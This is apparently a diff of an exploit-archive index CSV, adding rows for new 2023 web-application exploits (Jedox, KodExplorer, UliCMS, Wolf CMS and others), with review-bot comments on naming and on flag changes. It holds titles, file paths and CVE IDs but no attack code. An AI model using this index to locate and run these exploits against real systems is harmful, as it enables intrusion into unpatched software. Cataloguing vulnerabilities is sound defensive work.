12617,exploits/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",webapps,php,,2010-05-15,2017-07-14,0,OSVDB-55934,,file_thingie_v255_Jeremiah.zip,,, 12617,exploits/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",webapps,php,,2010-05-15,2017-07-14,0,OSVDB-55934,,file_thingie_v255_Jeremiah.zip,,,
51436,exploits/php/webapps/51436.py,"File Thingie 2.5.7 - Remote Code Execution (RCE)",2023-05-05,"Maurice Fielenbach (grimlockx)",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
10689,exploits/php/webapps/10689.txt,"file upload Ar Version - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,, 10689,exploits/php/webapps/10689.txt,"file upload Ar Version - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
11450,exploits/php/webapps/11450.txt,"File Upload Manager 1.3 - Web Shell File Upload",2010-02-14,ROOT_EGY,webapps,php,,2010-02-13,2017-11-15,0,,,,,, 11450,exploits/php/webapps/11450.txt,"File Upload Manager 1.3 - Web Shell File Upload",2010-02-14,ROOT_EGY,webapps,php,,2010-02-13,2017-11-15,0,,,,,,
30467,exploits/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php,,2007-08-09,2013-12-24,1,CVE-2007-4327;OSVDB-36425,,,,,https://www.securityfocus.com/bid/25253/info 30467,exploits/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php,,2007-08-09,2013-12-24,1,CVE-2007-4327;OSVDB-36425,,,,,https://www.securityfocus.com/bid/25253/info
@ -19899,7 +19903,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25323,exploits/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,webapps,php,,2005-03-31,2013-05-10,1,CVE-2005-0955;OSVDB-15168,,,,,https://www.securityfocus.com/bid/12957/info 25323,exploits/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,webapps,php,,2005-03-31,2013-05-10,1,CVE-2005-0955;OSVDB-15168,,,,,https://www.securityfocus.com/bid/12957/info
34941,exploits/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Cross-Site Scripting",2009-05-25,SmOk3,webapps,php,,2009-05-25,2014-10-12,1,CVE-2009-2289;OSVDB-54710,,,,,https://www.securityfocus.com/bid/44555/info 34941,exploits/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Cross-Site Scripting",2009-05-25,SmOk3,webapps,php,,2009-05-25,2014-10-12,1,CVE-2009-2289;OSVDB-54710,,,,,https://www.securityfocus.com/bid/44555/info
35416,exploits/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",webapps,php,,2011-03-03,2014-12-02,1,,,,,,https://www.securityfocus.com/bid/46771/info 35416,exploits/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",webapps,php,,2011-03-03,2014-12-02,1,,,,,,https://www.securityfocus.com/bid/46771/info
51274,exploits/php/webapps/51274.txt,"Intern Record System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-04-06,0,CVE-2022-40347,,,,, 51274,exploits/php/webapps/51274.txt,"Intern Record System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-05-05,1,CVE-2022-40347,,,,,
5617,exploits/php/webapps/5617.txt,"Internet PhotoShow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,webapps,php,,2008-05-13,,1,OSVDB-45502;CVE-2008-2282,,,,, 5617,exploits/php/webapps/5617.txt,"Internet PhotoShow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,webapps,php,,2008-05-13,,1,OSVDB-45502;CVE-2008-2282,,,,,
1694,exploits/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Remote File Inclusion",2006-04-18,Hessam-x,webapps,php,,2006-04-17,2016-11-29,1,OSVDB-24743;CVE-2006-1919,,,,, 1694,exploits/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Remote File Inclusion",2006-04-18,Hessam-x,webapps,php,,2006-04-17,2016-11-29,1,OSVDB-24743;CVE-2006-1919,,,,,
49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)",2021-05-04,argenestel,webapps,php,,2021-05-04,2021-10-29,0,,,,,, 49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)",2021-05-04,argenestel,webapps,php,,2021-05-04,2021-10-29,0,,,,,,
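Review bot: the 51274 row changes two fields with no stated reason: `date_updated` goes from 2023-04-06 to 2023-05-05 and the column after it from 0 to 1, while the title, author and CVE-2022-40347 stay the same. Suggest recording in the commit message why the flag was flipped, so the change is not read as a new entry.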
@ -20287,6 +20291,13 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12598,exploits/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,webapps,php,,2010-05-13,,1,OSVDB-64704;CVE-2010-2129,,,,, 12598,exploits/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,webapps,php,,2010-05-13,,1,OSVDB-64704;CVE-2010-2129,,,,,
15141,exploits/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,webapps,php,,2010-09-28,2010-09-28,1,,,,,, 15141,exploits/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,webapps,php,,2010-09-28,2010-09-28,1,,,,,,
12641,exploits/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,webapps,php,,2010-05-16,,1,OSVDB-64716;CVE-2010-2047,,,,, 12641,exploits/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,webapps,php,,2010-05-16,,1,OSVDB-64716;CVE-2010-2047,,,,,
51428,exploits/php/webapps/51428.txt,"Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47874,,,,,
51426,exploits/php/webapps/51426.txt,"Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47878,,,,,
51427,exploits/php/webapps/51427.txt,"Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47876,,,,,
51425,exploits/php/webapps/51425.txt,"Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47877,,,,,
51423,exploits/php/webapps/51423.txt,"Jedox 2022.4.2 - Code Execution via RPC Interfaces",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47879,,,,,
51429,exploits/php/webapps/51429.txt,"Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47880,,,,,
51424,exploits/php/webapps/51424.txt,"Jedox 2022.4.2 - Remote Code Execution via Directory Traversal",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47875,,,,,
31393,exploits/php/webapps/31393.txt,"Jeebles Directory 2.9.60 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-1355;OSVDB-43331,,,,,https://www.securityfocus.com/bid/28221/info 31393,exploits/php/webapps/31393.txt,"Jeebles Directory 2.9.60 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-1355;OSVDB-43331,,,,,https://www.securityfocus.com/bid/28221/info
30701,exploits/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,webapps,php,,2007-10-22,2014-01-05,1,CVE-2007-5706;OSVDB-41869,,,,,https://www.securityfocus.com/bid/26171/info 30701,exploits/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,webapps,php,,2007-10-22,2014-01-05,1,CVE-2007-5706;OSVDB-41869,,,,,https://www.securityfocus.com/bid/26171/info
45764,exploits/php/webapps/45764.txt,"Jelastic 5.4 - 'host' SQL Injection",2018-11-02,Procode701,webapps,php,80,2018-11-02,2018-11-02,0,,"SQL Injection (SQLi)",,,, 45764,exploits/php/webapps/45764.txt,"Jelastic 5.4 - 'host' SQL Injection",2018-11-02,Procode701,webapps,php,80,2018-11-02,2018-11-02,0,,"SQL Injection (SQLi)",,,,
@ -22069,6 +22080,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php,,2006-12-18,2013-10-30,1,CVE-2006-6721;OSVDB-31516,,,,,https://www.securityfocus.com/bid/21637/info 29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php,,2006-12-18,2013-10-30,1,CVE-2006-6721;OSVDB-31516,,,,,https://www.securityfocus.com/bid/21637/info
23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php,,2003-11-17,2012-12-14,1,,,,,,https://www.securityfocus.com/bid/9054/info 23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php,,2003-11-17,2012-12-14,1,,,,,,https://www.securityfocus.com/bid/9054/info
51388,exploits/php/webapps/51388.py,"KodExplorer 4.49 - CSRF to Arbitrary File Upload",2023-04-25,"Mr Empy",webapps,php,,2023-04-25,2023-04-25,0,CVE-2022-4944,,,,, 51388,exploits/php/webapps/51388.py,"KodExplorer 4.49 - CSRF to Arbitrary File Upload",2023-04-25,"Mr Empy",webapps,php,,2023-04-25,2023-04-25,0,CVE-2022-4944,,,,,
51419,exploits/php/webapps/51419.txt,"KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)",2023-05-05,nu11secur1ty,webapps,php,,2023-05-05,2023-05-05,0,,,,,,
37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4632;OSVDB-123654;OSVDB-123653,,,,http://www.exploit-db.comKoha-3.20.00.zip, 37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4632;OSVDB-123654;OSVDB-123653,,,,http://www.exploit-db.comKoha-3.20.00.zip,
37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2016-08-31,0,CVE-2015-4631;CVE-2015-4630,,,,http://www.exploit-db.comKoha-3.20.00.zip, 37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2016-08-31,0,CVE-2015-4631;CVE-2015-4630,,,,http://www.exploit-db.comKoha-3.20.00.zip,
37387,exploits/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4633;OSVDB-123650,,,,http://www.exploit-db.comKoha-3.20.00.zip, 37387,exploits/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4633;OSVDB-123650,,,,http://www.exploit-db.comKoha-3.20.00.zip,
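Review bot: The description on the added row 51419 writes the version as "v4.51.03", while the existing KodExplorer row directly above it (51388) uses the bare form "KodExplorer 4.49". Dropping the "v" would keep version strings uniform for anyone filtering this CSV by product and version. "Pwned-Admin" is also not a term used elsewhere in the visible rows; if it means the issue requires an administrator session, a parenthetical such as "(Authenticated)" would state the precondition more clearly.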
@ -24668,6 +24680,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-03-04,0,,,,,, 49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php,,2009-04-15,,1,OSVDB-53775,,,,, 8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php,,2009-04-15,,1,OSVDB-53775,,,,,
32932,exploits/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4934;OSVDB-53807,,,,,https://www.securityfocus.com/bid/34625/info 32932,exploits/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4934;OSVDB-53807,,,,,https://www.securityfocus.com/bid/34625/info
51431,exploits/php/webapps/51431.py,"Online Pizza Ordering System v1.0 - Unauthenticated File Upload",2023-05-05,URGAN,webapps,php,,2023-05-05,2023-05-05,0,CVE-2023-2246,,,,,
48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,,2020-07-15,2020-07-15,0,,,,,, 48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,,2020-07-15,2020-07-15,0,,,,,,
50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",2021-12-03,"Mohamed habib Smidi",webapps,php,,2021-12-03,2021-12-16,0,CVE-2021-44655,,,,, 50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",2021-12-03,"Mohamed habib Smidi",webapps,php,,2021-12-03,2021-12-16,0,CVE-2021-44655,,,,,
42640,exploits/php/webapps/42640.txt,"Online Print Business 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,,2017-09-10,2017-09-10,0,,,,,, 42640,exploits/php/webapps/42640.txt,"Online Print Business 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,,2017-09-10,2017-09-10,0,,,,,,
@ -27645,6 +27658,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",2022-03-16,"Ashish Koli",webapps,php,,2022-03-16,2022-03-16,0,CVE-2022-26965,,,,, 50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",2022-03-16,"Ashish Koli",webapps,php,,2022-03-16,2022-03-16,0,CVE-2022-26965,,,,,
40566,exploits/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",webapps,php,,2016-10-18,2016-10-18,0,,,,,http://www.exploit-db.compluck-4.7.3.zip, 40566,exploits/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",webapps,php,,2016-10-18,2016-10-18,0,,,,,http://www.exploit-db.compluck-4.7.3.zip,
38002,exploits/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,webapps,php,80,2015-08-28,2015-08-28,0,OSVDB-126897;OSVDB-126896;OSVDB-126895;OSVDB-126894;OSVDB-126893,,,,http://www.exploit-db.compluck-4.7.3.tar.gz, 38002,exploits/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,webapps,php,80,2015-08-28,2015-08-28,0,OSVDB-126897;OSVDB-126896;OSVDB-126895;OSVDB-126894;OSVDB-126893,,,,http://www.exploit-db.compluck-4.7.3.tar.gz,
51420,exploits/php/webapps/51420.txt,"pluck v4.7.18 - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
24357,exploits/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - 'Blog_Exec.php' Cross-Site Scripting",2004-08-07,"befcake beefy",webapps,php,,2004-08-07,2013-01-24,1,OSVDB-8349,,,,,https://www.securityfocus.com/bid/10885/info 24357,exploits/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - 'Blog_Exec.php' Cross-Site Scripting",2004-08-07,"befcake beefy",webapps,php,,2004-08-07,2013-01-24,1,OSVDB-8349,,,,,https://www.securityfocus.com/bid/10885/info
35482,exploits/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Cross-Site Scripting",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46962/info 35482,exploits/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Cross-Site Scripting",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46962/info
26750,exploits/php/webapps/26750.txt,"PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections",2005-12-06,r0t,webapps,php,,2005-12-06,2013-07-11,1,CVE-2005-4054;OSVDB-21480,,,,,https://www.securityfocus.com/bid/15746/info 26750,exploits/php/webapps/26750.txt,"PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections",2005-12-06,r0t,webapps,php,,2005-12-06,2013-07-11,1,CVE-2005-4054;OSVDB-21480,,,,,https://www.securityfocus.com/bid/15746/info
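Review bot: The added row 51420 names the product "pluck v4.7.18", but the three existing rows just above it all use "Pluck CMS" followed by a bare version number (4.7.16, 4.7.3). A defender searching the CSV for "Pluck CMS" to check exposure would miss this entry; suggest normalizing the description to "Pluck CMS 4.7.18 - Stored Cross-Site Scripting (XSS)".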
@ -29351,7 +29365,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49758,exploits/php/webapps/49758.txt,"Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)",2021-04-13,GaluhID,webapps,php,,2021-04-13,2021-04-13,0,,,,,, 49758,exploits/php/webapps/49758.txt,"Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)",2021-04-13,GaluhID,webapps,php,,2021-04-13,2021-04-13,0,,,,,,
50740,exploits/php/webapps/50740.txt,"Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2022-02-16,0,,,,,, 50740,exploits/php/webapps/50740.txt,"Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2022-02-16,0,,,,,,
50522,exploits/php/webapps/50522.txt,"Simple Subscription Website 1.0 - SQLi Authentication Bypass",2021-11-15,"Daniel Haro",webapps,php,,2021-11-15,2021-11-15,0,CVE-2021-43140,,,,, 50522,exploits/php/webapps/50522.txt,"Simple Subscription Website 1.0 - SQLi Authentication Bypass",2021-11-15,"Daniel Haro",webapps,php,,2021-11-15,2021-11-15,0,CVE-2021-43140,,,,,
51273,exploits/php/webapps/51273.txt,"Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-04-06,0,CVE-2022-40032,,,,, 51273,exploits/php/webapps/51273.txt,"Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-05-05,1,CVE-2022-40032,,,,,
7444,exploits/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,webapps,php,,2008-12-13,,1,OSVDB-50712;CVE-2008-5763;OSVDB-50711;CVE-2008-5762,,,,, 7444,exploits/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,webapps,php,,2008-12-13,,1,OSVDB-50712;CVE-2008-5763;OSVDB-50711;CVE-2008-5762,,,,,
50204,exploits/php/webapps/50204.txt,"Simple Water Refilling Station Management System 1.0 - Authentication Bypass",2021-08-16,"Matt Sorrell",webapps,php,,2021-08-16,2021-08-16,0,,,,,, 50204,exploits/php/webapps/50204.txt,"Simple Water Refilling Station Management System 1.0 - Authentication Bypass",2021-08-16,"Matt Sorrell",webapps,php,,2021-08-16,2021-08-16,0,,,,,,
50205,exploits/php/webapps/50205.py,"Simple Water Refilling Station Management System 1.0 - Remote Code Execution (RCE) through File Upload",2021-08-16,"Matt Sorrell",webapps,php,,2021-08-16,2021-08-16,0,,,,,, 50205,exploits/php/webapps/50205.py,"Simple Water Refilling Station Management System 1.0 - Remote Code Execution (RCE) through File Upload",2021-08-16,"Matt Sorrell",webapps,php,,2021-08-16,2021-08-16,0,,,,,,
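Review bot: Row 51273 is not a new entry. The only differences between the old and new sides are date_updated (2023-04-06 to 2023-05-05) and the field after it, which is the verified flag in this CSV's column order (0 to 1). The commit message lists "Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)" alongside the newly added exploits without saying it is a metadata-only update, so a reader of the changelog cannot tell that the status changed rather than the content. Suggest marking such lines in the commit message as updated or verified.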
@ -31028,6 +31042,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80,2019-04-22,2019-04-22,0,CVE-2019-11398,"Cross-Site Scripting (XSS)",,,, 46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80,2019-04-22,2019-04-22,0,CVE-2019-11398,"Cross-Site Scripting (XSS)",,,,
48244,exploits/php/webapps/48244.txt,"UliCMS 2020.1 - Persistent Cross-Site Scripting",2020-03-24,SunCSR,webapps,php,,2020-03-24,2020-05-11,0,CVE-2020-12704,,,,, 48244,exploits/php/webapps/48244.txt,"UliCMS 2020.1 - Persistent Cross-Site Scripting",2020-03-24,SunCSR,webapps,php,,2020-03-24,2020-05-11,0,CVE-2020-12704,,,,,
39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80,2016-02-04,2016-02-04,1,,,,,http://www.exploit-db.comulicms-9.8.1-snowfall-full.zip, 39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80,2016-02-04,2016-02-04,1,,,,,http://www.exploit-db.comulicms-9.8.1-snowfall-full.zip,
51434,exploits/php/webapps/51434.txt,"Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
51435,exploits/php/webapps/51435.txt,"Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
11048,exploits/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - 'ladder.php' SQL Injection",2010-01-07,Sora,webapps,php,,2010-01-06,,1,,,,,, 11048,exploits/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - 'ladder.php' SQL Injection",2010-01-07,Sora,webapps,php,,2010-01-06,,1,,,,,,
11385,exploits/php/webapps/11385.txt,"ULoki Community Forum 2.1 - 'usercp.php' Cross-Site Scripting",2010-02-10,"Sioma Labs",webapps,php,,2010-02-09,,1,,,,,, 11385,exploits/php/webapps/11385.txt,"ULoki Community Forum 2.1 - 'usercp.php' Cross-Site Scripting",2010-02-10,"Sioma Labs",webapps,php,,2010-02-09,,1,,,,,,
34888,exploits/php/webapps/34888.txt,"UloKI PHP Forum 2.1 - 'search.php' Cross-Site Scripting",2009-08-19,Moudi,webapps,php,,2009-08-19,2016-10-10,1,CVE-2009-3202;OSVDB-57176,,,,,https://www.securityfocus.com/bid/44273/info 34888,exploits/php/webapps/34888.txt,"UloKI PHP Forum 2.1 - 'search.php' Cross-Site Scripting",2009-08-19,Moudi,webapps,php,,2009-08-19,2016-10-10,1,CVE-2009-3202;OSVDB-57176,,,,,https://www.securityfocus.com/bid/44273/info
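Review bot: The two added rows 51434 and 51435 spell the product "Ulicms-2023.1 sniffing-vicuna", while every existing row in the surrounding context uses "UliCMS" followed by a space and the version ("UliCMS 2019.2 / 2019.1", "UliCMS 2020.1", "UliCMS v9.8.1"). The different casing and the hyphen joined to the version break exact-match lookups on product name. Suggest "UliCMS 2023.1 (sniffing-vicuna) - ..." so the release codename is kept but the name matches. The XSS row 51435 also leaves the tags column empty, whereas row 46741 carries "Cross-Site Scripting (XSS)" there.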
@ -32237,6 +32253,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15614,exploits/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",webapps,php,,2010-11-25,2010-11-25,1,,,,,http://www.exploit-db.comwolfcms_060b.zip,http://www.htbridge.ch/advisory/xsrf_csrf_in_wolf_cms.html 15614,exploits/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",webapps,php,,2010-11-25,2010-11-25,1,,,,,http://www.exploit-db.comwolfcms_060b.zip,http://www.htbridge.ch/advisory/xsrf_csrf_in_wolf_cms.html
18545,exploits/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,webapps,php,,2012-02-29,2012-03-16,0,OSVDB-79703;OSVDB-79702,,,,http://www.exploit-db.comwolfcms_075.zip,https://www.vulnerability-lab.com/get_content.php?id=452 18545,exploits/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,webapps,php,,2012-02-29,2012-03-16,0,OSVDB-79703;OSVDB-79702,,,,http://www.exploit-db.comwolfcms_075.zip,https://www.vulnerability-lab.com/get_content.php?id=452
36818,exploits/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload",2015-04-22,"CWH Underground",webapps,php,80,2015-04-22,2015-04-22,0,OSVDB-120877,,,,http://www.exploit-db.comwolfcms-0.8.2.zip, 36818,exploits/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload",2015-04-22,"CWH Underground",webapps,php,80,2015-04-22,2015-04-22,0,OSVDB-120877,,,,http://www.exploit-db.comwolfcms-0.8.2.zip,
51421,exploits/php/webapps/51421.txt,"Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)",2023-05-05,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
18652,exploits/php/webapps/18652.txt,"Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting",2012-03-23,"Ivano Binetti",webapps,php,,2012-03-23,2012-03-23,0,OSVDB-80537;OSVDB-80298;CVE-2012-1898;CVE-2012-1897,,,,,http://www.webapp-security.com/2012/03/wolfcms/ 18652,exploits/php/webapps/18652.txt,"Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting",2012-03-23,"Ivano Binetti",webapps,php,,2012-03-23,2012-03-23,0,OSVDB-80537;OSVDB-80298;CVE-2012-1898;CVE-2012-1897,,,,,http://www.webapp-security.com/2012/03/wolfcms/
